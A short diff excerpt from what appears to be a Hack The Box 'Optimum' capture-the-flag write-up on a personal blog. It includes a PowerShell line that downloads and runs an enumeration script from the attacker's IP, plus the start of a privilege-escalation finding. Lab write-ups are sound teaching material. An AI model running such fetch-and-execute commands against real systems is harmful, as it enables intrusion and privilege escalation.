pencer-io/pencer-io.github.io/_posts/2020-06-29-ctf-htb-optimum.md

 PS C:\Users\kostas\Desktop> IEX(New-Object Net.Webclient).downloadString('http://10.10.14.22:8000/Sherlock.ps1')
 ```

-This will run the script to check, has lots of possibilities, but go with this one:
+This will run the script to check, and I see it has lots of possibilities, but I go with this one:

 ```text
 Title      : Secondary Logon Handle